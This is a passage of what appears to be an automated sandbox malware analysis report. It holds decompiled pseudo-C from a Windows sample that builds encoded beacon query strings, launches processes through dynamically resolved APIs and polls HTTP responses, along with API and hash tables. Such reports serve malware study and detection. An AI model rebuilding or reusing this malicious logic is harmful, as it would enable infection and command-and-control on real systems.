                            				intOrPtr _t71;
                            				intOrPtr _t72;
                            				intOrPtr _t73;
                            				void* _t76;
                            				intOrPtr _t77;
                            				int _t80;
                            				intOrPtr _t81;
                            				intOrPtr _t85;
                            				intOrPtr _t86;
                            				intOrPtr _t87;
                            				void* _t89;
                            				void* _t92;
                            				intOrPtr _t96;
                            				intOrPtr _t100;
                            				intOrPtr* _t102;
                            				int* _t108;
                            				int* _t118;
                            				char** _t120;
                            				char* _t121;
                            				intOrPtr* _t126;
                            				intOrPtr* _t128;
                            				intOrPtr* _t130;
                            				intOrPtr* _t132;
                            				intOrPtr _t135;
                            				intOrPtr _t139;
                            				int _t142;
                            				intOrPtr _t144;
                            				int _t147;
                            				intOrPtr _t148;
                            				int _t151;
                            				void* _t152;
                            				intOrPtr _t166;
                            				void* _t168;
                            				int _t169;
                            				void* _t170;
                            				void* _t171;
                            				long _t172;
                            				intOrPtr* _t173;
                            				intOrPtr* _t174;
                            				intOrPtr _t175;
                            				intOrPtr* _t178;
                            				char** _t181;
                            				char** _t183;
                            				char** _t184;
                            				void* _t189;
                            
                            				_t68 = __eax;
                            				_t181 =  &_v16;
                            				_t152 = _a20;
                            				_a20 = 8;
                            				if(__eax == 0) {
                            					_t68 = GetTickCount();
                            				}
                            				_t69 =  *0x6da018; // 0xc9f186aa
                            				asm("bswap eax");
                            				_t70 =  *0x6da014; // 0x3a87c8cd
                            				asm("bswap eax");
                            				_t71 =  *0x6da010; // 0xd8d2f808
                            				asm("bswap eax");
                            				_t72 =  *0x6da00c; // 0xeec43f25
                            				asm("bswap eax");
                            				_t73 =  *0x6da348; // 0xdcd5a8
                            				_t3 = _t73 + 0x6db62b; // 0x74666f73
                            				_t169 = wsprintfA(_t152, _t3, 3, 0x3d186, _t72, _t71, _t70, _t69,  *0x6da02c,  *0x6da004, _t68);
                            				_t76 = E006D1308();
                            				_t77 =  *0x6da348; // 0xdcd5a8
                            				_t4 = _t77 + 0x6db66b; // 0x74707526
                            				_t80 = wsprintfA(_t169 + _t152, _t4, _t76);
                            				_t183 =  &(_t181[0xe]);
                            				_t170 = _t169 + _t80;
                            				if(_a24 != 0) {
                            					_t148 =  *0x6da348; // 0xdcd5a8
                            					_t8 = _t148 + 0x6db676; // 0x732526
                            					_t151 = wsprintfA(_t170 + _t152, _t8, _a24);
                            					_t183 =  &(_t183[3]);
                            					_t170 = _t170 + _t151;
                            				}
                            				_t81 =  *0x6da348; // 0xdcd5a8
                            				_t10 = _t81 + 0x6db78e; // 0x14a8d36
                            				_t153 = _t10;
                            				_t189 = _a20 - _t10;
                            				_t12 = _t81 + 0x6db2de; // 0x74636126
                            				_t164 = 0 | _t189 == 0x00000000;
                            				_t171 = _t170 + wsprintfA(_t170 + _t152, _t12, _t189 == 0);
                            				_t85 =  *0x6da36c; // 0x14a95b0
                            				_t184 =  &(_t183[3]);
                            				if(_t85 != 0) {
                            					_t144 =  *0x6da348; // 0xdcd5a8
                            					_t16 = _t144 + 0x6db889; // 0x3d736f26
                            					_t147 = wsprintfA(_t171 + _t152, _t16, _t85);
                            					_t184 =  &(_t184[3]);
                            					_t171 = _t171 + _t147;
                            				}
                            				_t86 = E006D3DE0(_t153);
                            				_a32 = _t86;
                            				if(_t86 != 0) {
                            					_t139 =  *0x6da348; // 0xdcd5a8
                            					_t19 = _t139 + 0x6db8c2; // 0x736e6426
                            					_t142 = wsprintfA(_t171 + _t152, _t19, _t86);
                            					_t184 =  &(_t184[3]);
                            					_t171 = _t171 + _t142;
                            					HeapFree( *0x6da2d8, 0, _a40);
                            				}
                            				_t87 = E006D3ACA();
                            				_a32 = _t87;
                            				if(_t87 != 0) {
                            					_t135 =  *0x6da348; // 0xdcd5a8
                            					_t23 = _t135 + 0x6db8ca; // 0x6f687726
                            					wsprintfA(_t171 + _t152, _t23, _t87);
                            					_t184 =  &(_t184[3]);
                            					HeapFree( *0x6da2d8, 0, _a40);
                            				}
                            				_t166 =  *0x6da3cc; // 0x14a9600
                            				_t89 = E006D4B69(0x6da00a, _t166 + 4);
                            				_t172 = 0;
                            				_a16 = _t89;
                            				if(_t89 == 0) {
                            					L30:
                            					HeapFree( *0x6da2d8, _t172, _t152);
                            					return _a44;
                            				} else {
                            					_t92 = RtlAllocateHeap( *0x6da2d8, 0, 0x800);
                            					_a24 = _t92;
                            					if(_t92 == 0) {
                            						L29:
                            						HeapFree( *0x6da2d8, _t172, _a8);
                            						goto L30;
                            					}
                            					E006D53AE(GetTickCount());
                            					_t96 =  *0x6da3cc; // 0x14a9600
                            					__imp__(_t96 + 0x40);
                            					asm("lock xadd [eax], ecx");
                            					_t100 =  *0x6da3cc; // 0x14a9600
                            					__imp__(_t100 + 0x40);
                            					_t102 =  *0x6da3cc; // 0x14a9600
                            					_t168 = E006D2281(1, _t164, _t152,  *_t102);
                            					asm("lock xadd [eax], ecx");
                            					if(_t168 == 0) {
                            						L28:
                            						HeapFree( *0x6da2d8, _t172, _a16);
                            						goto L29;
                            					}
                            					StrTrimA(_t168, 0x6d9280);
                            					_push(_t168);
                            					_t108 = E006D6311();
                            					_v12 = _t108;
                            					if(_t108 == 0) {
                            						L27:
                            						HeapFree( *0x6da2d8, _t172, _t168);
                            						goto L28;
                            					}
                            					_t173 = __imp__;
                            					 *_t173(_t168, _a8);
                            					 *_t173(_a4, _v12);
                            					_t174 = __imp__;
                            					 *_t174(_v4, _v24);
                            					_t175 = E006D3D2E( *_t174(_v12, _t168), _v20);
                            					_v36 = _t175;
                            					if(_t175 == 0) {
                            						_v8 = 8;
                            						L25:
                            						E006D14C6();
                            						L26:
                            						HeapFree( *0x6da2d8, 0, _v40);
                            						_t172 = 0;
                            						goto L27;
                            					}
                            					_t118 = E006D7446(_t152, 0xffffffffffffffff, _t168,  &_v24);
                            					_v12 = _t118;
                            					if(_t118 == 0) {
                            						_t178 = _v24;
                            						_v20 = E006D1335(_t178, _t175, _v16, _v12);
                            						_t126 =  *((intOrPtr*)(_t178 + 8));
                            						 *((intOrPtr*)( *_t126 + 0x80))(_t126);
                            						_t128 =  *((intOrPtr*)(_t178 + 8));
                            						 *((intOrPtr*)( *_t128 + 8))(_t128);
                            						_t130 =  *((intOrPtr*)(_t178 + 4));
                            						 *((intOrPtr*)( *_t130 + 8))(_t130);
                            						_t132 =  *_t178;
                            						 *((intOrPtr*)( *_t132 + 8))(_t132);
                            						E006D789E(_t178);
                            					}
                            					if(_v8 != 0x10d2) {
                            						L20:
                            						if(_v8 == 0) {
                            							_t120 = _v16;
                            							if(_t120 != 0) {
                            								_t121 =  *_t120;
                            								_t176 =  *_v12;
                            								_v16 = _t121;
                            								wcstombs(_t121, _t121,  *_v12);
                            								 *_v24 = E006D5F92(_v16, _v16, _t176 >> 1);
                            							}
                            						}
                            						goto L23;
                            					} else {
                            						if(_v16 != 0) {
                            							L23:
                            							E006D789E(_v32);
                            							if(_v12 == 0 || _v8 == 0x10d2) {
                            								goto L26;
                            							} else {
                            								goto L25;
                            							}
                            						}
                            						_v8 = _v8 & 0x00000000;
                            						goto L20;
                            					}
                            				}
                            			}

                            APIs
                            • GetTickCount.KERNEL32 ref: 006D6CBB
                            • wsprintfA.USER32 ref: 006D6D08
                            • wsprintfA.USER32 ref: 006D6D25
                            • wsprintfA.USER32 ref: 006D6D47
                            • wsprintfA.USER32 ref: 006D6D6E
                            • wsprintfA.USER32 ref: 006D6D8F
                            • wsprintfA.USER32 ref: 006D6DBA
                            • HeapFree.KERNEL32(00000000,?), ref: 006D6DCD
                            • wsprintfA.USER32 ref: 006D6DEC
                            • HeapFree.KERNEL32(00000000,?), ref: 006D6DFD
                              • Part of subcall function 006D4B69: RtlEnterCriticalSection.NTDLL(014A95C0), ref: 006D4B85
                              • Part of subcall function 006D4B69: RtlLeaveCriticalSection.NTDLL(014A95C0), ref: 006D4BA3
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 006D6E2C
                            • GetTickCount.KERNEL32 ref: 006D6E3E
                            • RtlEnterCriticalSection.NTDLL(014A95C0), ref: 006D6E52
                            • RtlLeaveCriticalSection.NTDLL(014A95C0), ref: 006D6E70
                              • Part of subcall function 006D2281: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D22AC
                              • Part of subcall function 006D2281: lstrlen.KERNEL32(00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D22B4
                              • Part of subcall function 006D2281: strcpy.NTDLL ref: 006D22CB
                              • Part of subcall function 006D2281: lstrcat.KERNEL32(00000000,00000000), ref: 006D22D6
                              • Part of subcall function 006D2281: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,006D3831,?,7491C740,006D3831,00000000,014A9600), ref: 006D22F3
                            • StrTrimA.SHLWAPI(00000000,006D9280,?,014A9600), ref: 006D6EA2
                              • Part of subcall function 006D6311: lstrlen.KERNEL32(014A9BD0,00000000,00000000,00000000,006D385C,00000000), ref: 006D6321
                              • Part of subcall function 006D6311: lstrlen.KERNEL32(?), ref: 006D6329
                              • Part of subcall function 006D6311: lstrcpy.KERNEL32(00000000,014A9BD0), ref: 006D633D
                              • Part of subcall function 006D6311: lstrcat.KERNEL32(00000000,?), ref: 006D6348
                            • lstrcpy.KERNEL32(00000000,?), ref: 006D6EC5
                            • lstrcpy.KERNEL32(?,?), ref: 006D6ECF
                            • lstrcat.KERNEL32(?,?), ref: 006D6EDF
                            • lstrcat.KERNEL32(?,00000000), ref: 006D6EE6
                              • Part of subcall function 006D3D2E: lstrlen.KERNEL32(?,00000000,014A9DE0,00000000,006D695F,014AA003,69B25F44,?,?,?,?,69B25F44,00000005,006DA00C,4D283A53,?), ref: 006D3D35
                              • Part of subcall function 006D3D2E: mbstowcs.NTDLL ref: 006D3D5E
                              • Part of subcall function 006D3D2E: memset.NTDLL ref: 006D3D70
                            • wcstombs.NTDLL ref: 006D6F89
                              • Part of subcall function 006D1335: SysAllocString.OLEAUT32(?), ref: 006D1370
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            • HeapFree.KERNEL32(00000000,?), ref: 006D6FD2
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 006D6FDE
                            • HeapFree.KERNEL32(00000000,?,?,014A9600), ref: 006D6FEB
                            • HeapFree.KERNEL32(00000000,?), ref: 006D6FF8
                            • HeapFree.KERNEL32(00000000,?), ref: 006D7002
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Heap$Free$wsprintf$lstrlen$CriticalSectionlstrcat$lstrcpy$CountEnterLeaveTickTrim$AllocAllocateStringmbstowcsmemsetstrcpywcstombs
                            • String ID:
                            • API String ID: 1185349883-0
                            • Opcode ID: ac9e80cf48bec58839d187bdbcd9166ce1abdfb095c54725be404246d7a9fc5e
                            • Instruction ID: 73e3f92deabb1294c1ed95162622e5232200e5a7f8be4bc09a2f5bffb3a96f7a
                            • Opcode Fuzzy Hash: ac9e80cf48bec58839d187bdbcd9166ce1abdfb095c54725be404246d7a9fc5e
                            • Instruction Fuzzy Hash: 75A19C71D0A210AFC711AFA5EC44E9A7BEBEF88314F0A142AF449D7361D731D905DB62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 55%
                            			E006D41C5(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR** _a16, WCHAR** _a20) {
                            				intOrPtr _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				char _v20;
                            				WCHAR* _v24;
                            				signed int _v28;
                            				intOrPtr _v32;
                            				void* __edi;
                            				void* __esi;
                            				WCHAR* _t58;
                            				signed int _t60;
                            				signed int _t62;
                            				intOrPtr _t64;
                            				intOrPtr _t66;
                            				intOrPtr _t70;
                            				void* _t72;
                            				void* _t75;
                            				void* _t76;
                            				WCHAR* _t80;
                            				WCHAR* _t83;
                            				void* _t84;
                            				void* _t85;
                            				void* _t86;
                            				intOrPtr _t92;
                            				signed int _t103;
                            				void* _t104;
                            				intOrPtr _t105;
                            				void* _t107;
                            				intOrPtr* _t115;
                            				void* _t119;
                            				WCHAR* _t125;
                            
                            				_t58 =  *0x6da3dc; // 0x14a9c88
                            				_v24 = _t58;
                            				_v28 = 8;
                            				_v20 = GetTickCount();
                            				_t60 = E006D540A();
                            				_t103 = 5;
                            				_t98 = _t60 % _t103 + 6;
                            				_t62 = E006D540A();
                            				_t117 = _t62 % _t103 + 6;
                            				_v32 = _t62 % _t103 + 6;
                            				_t64 = E006D2C2A(_t60 % _t103 + 6);
                            				_v16 = _t64;
                            				if(_t64 != 0) {
                            					_t66 = E006D2C2A(_t117);
                            					_v12 = _t66;
                            					if(_t66 != 0) {
                            						_push(5);
                            						_t104 = 0xa;
                            						_t119 = E006D5C2F(_t104,  &_v20);
                            						if(_t119 == 0) {
                            							_t119 = 0x6d918c;
                            						}
                            						_t70 = E006D224E(_v24);
                            						_v8 = _t70;
                            						if(_t70 != 0) {
                            							_t115 = __imp__;
                            							_t72 =  *_t115(_t119);
                            							_t75 =  *_t115(_v8);
                            							_t76 =  *_t115(_a4);
                            							_t80 = E006D7A71(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
                            							_v24 = _t80;
                            							if(_t80 != 0) {
                            								_t105 =  *0x6da348; // 0xdcd5a8
                            								_t28 = _t105 + 0x6dbb08; // 0x530025
                            								wsprintfW(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
                            								_push(4);
                            								_t107 = 5;
                            								_t83 = E006D5C2F(_t107,  &_v20);
                            								_a8 = _t83;
                            								if(_t83 == 0) {
                            									_a8 = 0x6d9190;
                            								}
                            								_t84 =  *_t115(_a8);
                            								_t85 =  *_t115(_v8);
                            								_t86 =  *_t115(_a4);
                            								_t125 = E006D7A71(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
                            								if(_t125 == 0) {
                            									E006D789E(_v24);
                            								} else {
                            									_t92 =  *0x6da348; // 0xdcd5a8
                            									_t44 = _t92 + 0x6dbc80; // 0x73006d
                            									wsprintfW(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
                            									 *_a16 = _v24;
                            									_v28 = _v28 & 0x00000000;
                            									 *_a20 = _t125;
                            								}
                            							}
                            							E006D789E(_v8);
                            						}
                            						E006D789E(_v12);
                            					}
                            					E006D789E(_v16);
                            				}
                            				return _v28;
                            			}

                            0x006d41cb
                            0x006d41d3
                            0x006d41d6
                            0x006d41e3
                            0x006d41e6
                            0x006d41ed
                            0x006d41f4
                            0x006d41f7
                            0x006d4204
                            0x006d4207
                            0x006d420a
                            0x006d420f
                            0x006d4214
                            0x006d421c
                            0x006d4221
                            0x006d4226
                            0x006d422c
                            0x006d4230
                            0x006d4239
                            0x006d423d
                            0x006d423f
                            0x006d423f
                            0x006d4247
                            0x006d424c
                            0x006d4251
                            0x006d4257
                            0x006d425e
                            0x006d426f
                            0x006d4276
                            0x006d4288
                            0x006d428d
                            0x006d4292
                            0x006d429b
                            0x006d42ad
                            0x006d42c3
                            0x006d42c8
                            0x006d42cc
                            0x006d42d0
                            0x006d42d5
                            0x006d42da
                            0x006d42dc
                            0x006d42dc
                            0x006d42e6
                            0x006d42ef
                            0x006d42f6
                            0x006d4312
                            0x006d4316
                            0x006d434f
                            0x006d4318
                            0x006d431b
                            0x006d4323
                            0x006d4334
                            0x006d433c
                            0x006d4344
                            0x006d4348
                            0x006d4348
                            0x006d4316
                            0x006d4357
                            0x006d4357
                            0x006d435f
                            0x006d435f
                            0x006d4367
                            0x006d4367
                            0x006d4373

                            APIs
                            • GetTickCount.KERNEL32 ref: 006D41DD
                            • lstrlen.KERNEL32(00000000,00000005), ref: 006D425E
                            • lstrlen.KERNEL32(?), ref: 006D426F
                            • lstrlen.KERNEL32(00000000), ref: 006D4276
                            • lstrlenW.KERNEL32(80000002), ref: 006D427D
                            • wsprintfW.USER32 ref: 006D42C3
                            • lstrlen.KERNEL32(?,00000004), ref: 006D42E6
                            • lstrlen.KERNEL32(?), ref: 006D42EF
                            • lstrlen.KERNEL32(?), ref: 006D42F6
                            • lstrlenW.KERNEL32(?), ref: 006D42FD
                            • wsprintfW.USER32 ref: 006D4334
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: lstrlen$wsprintf$CountFreeHeapTick
                            • String ID:
                            • API String ID: 822878831-0
                            • Opcode ID: 7531ce7e9207a1441ebdde014b75e6c9de67f9e7221373395eb158ee5211b7e1
                            • Instruction ID: 160765277b6df902223264acbc22fe345283d3d6d767d90e19766e92c2bd2aae
                            • Opcode Fuzzy Hash: 7531ce7e9207a1441ebdde014b75e6c9de67f9e7221373395eb158ee5211b7e1
                            • Instruction Fuzzy Hash: 38516A72D0021AABCF12AFA9DC45ADE7BB3EF44314F15406AF904A7321DB358E11DBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E006D3BF0(void* __eax, void* __ecx) {
                            				long _v8;
                            				char _v12;
                            				void* _v16;
                            				void* _v28;
                            				long _v32;
                            				void _v104;
                            				char _v108;
                            				long _t36;
                            				intOrPtr _t40;
                            				intOrPtr _t47;
                            				intOrPtr _t50;
                            				void* _t58;
                            				void* _t68;
                            				intOrPtr* _t70;
                            				intOrPtr* _t71;
                            
                            				_t1 = __eax + 0x14; // 0x74183966
                            				_t69 =  *_t1;
                            				_t36 = E006D2AA6(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
                            				_v8 = _t36;
                            				if(_t36 != 0) {
                            					L12:
                            					return _v8;
                            				}
                            				E006D7A86( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                            				_t40 = _v12(_v12);
                            				_v8 = _t40;
                            				if(_t40 == 0 && ( *0x6da300 & 0x00000001) != 0) {
                            					_v32 = 0;
                            					asm("stosd");
                            					asm("stosd");
                            					asm("stosd");
                            					_v108 = 0;
                            					memset( &_v104, 0, 0x40);
                            					_t47 =  *0x6da348; // 0xdcd5a8
                            					_t18 = _t47 + 0x6db3f3; // 0x73797325
                            					_t68 = E006D3A12(_t18);
                            					if(_t68 == 0) {
                            						_v8 = 8;
                            					} else {
                            						_t50 =  *0x6da348; // 0xdcd5a8
                            						_t19 = _t50 + 0x6db73f; // 0x14a8ce7
                            						_t20 = _t50 + 0x6db0af; // 0x4e52454b
                            						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                            						if(_t71 == 0) {
                            							_v8 = 0x7f;
                            						} else {
                            							_v108 = 0x44;
                            							E006D2058();
                            							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                            							_push(1);
                            							E006D2058();
                            							if(_t58 == 0) {
                            								_v8 = GetLastError();
                            							} else {
                            								CloseHandle(_v28);
                            								CloseHandle(_v32);
                            							}
                            						}
                            						HeapFree( *0x6da2d8, 0, _t68);
                            					}
                            				}
                            				_t70 = _v16;
                            				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                            				E006D789E(_t70);
                            				goto L12;
                            			}

                            0x006d3bf8
                            0x006d3bf8
                            0x006d3c07
                            0x006d3c0e
                            0x006d3c13
                            0x006d3d20
                            0x006d3d27
                            0x006d3d27
                            0x006d3c22
                            0x006d3c2a
                            0x006d3c2d
                            0x006d3c32
                            0x006d3c47
                            0x006d3c4d
                            0x006d3c4e
                            0x006d3c51
                            0x006d3c57
                            0x006d3c5a
                            0x006d3c5f
                            0x006d3c67
                            0x006d3c73
                            0x006d3c77
                            0x006d3d07
                            0x006d3c7d
                            0x006d3c7d
                            0x006d3c82
                            0x006d3c89
                            0x006d3c9d
                            0x006d3ca1
                            0x006d3cf0
                            0x006d3ca3
                            0x006d3ca4
                            0x006d3cab
                            0x006d3cc4
                            0x006d3cc6
                            0x006d3cca
                            0x006d3cd1
                            0x006d3ceb
                            0x006d3cd3
                            0x006d3cdc
                            0x006d3ce1
                            0x006d3ce1
                            0x006d3cd1
                            0x006d3cff
                            0x006d3cff
                            0x006d3c77
                            0x006d3d0e
                            0x006d3d17
                            0x006d3d1b
                            0x00000000

                            APIs
                              • Part of subcall function 006D2AA6: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,006D3C0C,?,?,?,?,00000000,00000000), ref: 006D2ACB
                              • Part of subcall function 006D2AA6: GetProcAddress.KERNEL32(00000000,7243775A), ref: 006D2AED
                              • Part of subcall function 006D2AA6: GetProcAddress.KERNEL32(00000000,614D775A), ref: 006D2B03
                              • Part of subcall function 006D2AA6: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 006D2B19
                              • Part of subcall function 006D2AA6: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 006D2B2F
                              • Part of subcall function 006D2AA6: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 006D2B45
                            • memset.NTDLL ref: 006D3C5A
                              • Part of subcall function 006D3A12: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,006D3C73,73797325), ref: 006D3A23
                              • Part of subcall function 006D3A12: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 006D3A3D
                            • GetModuleHandleA.KERNEL32(4E52454B,014A8CE7,73797325), ref: 006D3C90
                            • GetProcAddress.KERNEL32(00000000), ref: 006D3C97
                            • HeapFree.KERNEL32(00000000,00000000), ref: 006D3CFF
                              • Part of subcall function 006D2058: GetProcAddress.KERNEL32(36776F57,006D58B5), ref: 006D2073
                            • CloseHandle.KERNEL32(00000000,00000001), ref: 006D3CDC
                            • CloseHandle.KERNEL32(?), ref: 006D3CE1
                            • GetLastError.KERNEL32(00000001), ref: 006D3CE5
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                            • String ID:
                            • API String ID: 3075724336-0
                            • Opcode ID: e0574df71f4952e633a0f14ad726283faa2db324f61d2d543bc4fe9a1dd9bab7
                            • Instruction ID: 29bffde807debdf4759539c87e941e55a2cf7f89dd95f89799664c3921f6bd9d
                            • Opcode Fuzzy Hash: e0574df71f4952e633a0f14ad726283faa2db324f61d2d543bc4fe9a1dd9bab7
                            • Instruction Fuzzy Hash: 13314F72C00219AFDB10AFA5DC89EAEBBBAEF08344F15446AE505E7321D7309E45CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E006D4E4D(void* __ecx, void* __esi) {
                            				long _v8;
                            				long _v12;
                            				long _v16;
                            				long _v20;
                            				long _t34;
                            				long _t39;
                            				long _t42;
                            				long _t56;
                            				void* _t58;
                            				void* _t59;
                            				void* _t61;
                            
                            				_t61 = __esi;
                            				_t59 = __ecx;
                            				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                            				do {
                            					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                            					_v20 = _t34;
                            					if(_t34 != 0) {
                            						L3:
                            						_v8 = 4;
                            						_v16 = 0;
                            						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
                            							_t39 = GetLastError();
                            							_v12 = _t39;
                            							if(_v20 == 0 || _t39 != 0x2ef3) {
                            								L15:
                            								return _v12;
                            							} else {
                            								goto L11;
                            							}
                            						}
                            						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
                            							goto L11;
                            						} else {
                            							_v16 = 0;
                            							_v8 = 0;
                            							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
                            							_t58 = E006D7A71(_v8 + 1);
                            							if(_t58 == 0) {
                            								_v12 = 8;
                            							} else {
                            								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
                            									E006D789E(_t58);
                            									_v12 = GetLastError();
                            								} else {
                            									 *((char*)(_t58 + _v8)) = 0;
                            									 *(_t61 + 0xc) = _t58;
                            								}
                            							}
                            							goto L15;
                            						}
                            					}
                            					SetEvent( *(_t61 + 0x1c));
                            					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                            					_v12 = _t56;
                            					if(_t56 != 0) {
                            						goto L15;
                            					}
                            					goto L3;
                            					L11:
                            					_t42 = E006D2129( *(_t61 + 0x1c), _t59, 0xea60);
                            					_v12 = _t42;
                            				} while (_t42 == 0);
                            				goto L15;
                            			}

                            0x006d4e4d
                            0x006d4e4d
                            0x006d4e5d
                            0x006d4e60
                            0x006d4e64
                            0x006d4e6a
                            0x006d4e6f
                            0x006d4e88
                            0x006d4e9c
                            0x006d4ea3
                            0x006d4eaa
                            0x006d4efd
                            0x006d4f03
                            0x006d4f09
                            0x006d4f44
                            0x006d4f4a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d4f09
                            0x006d4eb0
                            0x00000000
                            0x006d4eb7
                            0x006d4ec5
                            0x006d4ec8
                            0x006d4ecb
                            0x006d4ed7
                            0x006d4edb
                            0x006d4f3d
                            0x006d4edd
                            0x006d4eef
                            0x006d4f2d
                            0x006d4f38
                            0x006d4ef1
                            0x006d4ef4
                            0x006d4ef8
                            0x006d4ef8
                            0x006d4eef
                            0x00000000
                            0x006d4edb
                            0x006d4eb0
                            0x006d4e74
                            0x006d4e7a
                            0x006d4e7d
                            0x006d4e82
                            0x00000000
                            0x00000000
                            0x00000000
                            0x006d4f12
                            0x006d4f1a
                            0x006d4f1f
                            0x006d4f22
                            0x00000000

                            APIs
                            • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,74CF81D0,00000000,00000000), ref: 006D4E64
                            • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,006D3897,00000000,?), ref: 006D4E74
                            • HttpQueryInfoA.WININET(?,20000013,?,?), ref: 006D4EA6
                            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 006D4ECB
                            • HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 006D4EEB
                            • GetLastError.KERNEL32 ref: 006D4EFD
                              • Part of subcall function 006D2129: WaitForMultipleObjects.KERNEL32(00000002,006D7C1D,00000000,006D7C1D,?,?,?,006D7C1D,0000EA60), ref: 006D2144
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            • GetLastError.KERNEL32(00000000), ref: 006D4F32
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                            • String ID:
                            • API String ID: 3369646462-0
                            • Opcode ID: 7d8d77f4314e8d86bef9c3c5628921e42b7a05075b066be07520567c4b97a4c8
                            • Instruction ID: 737016f641b34926c5ab7a9f05bb2715bf6fecceb95d202dfea37754cd5f130b
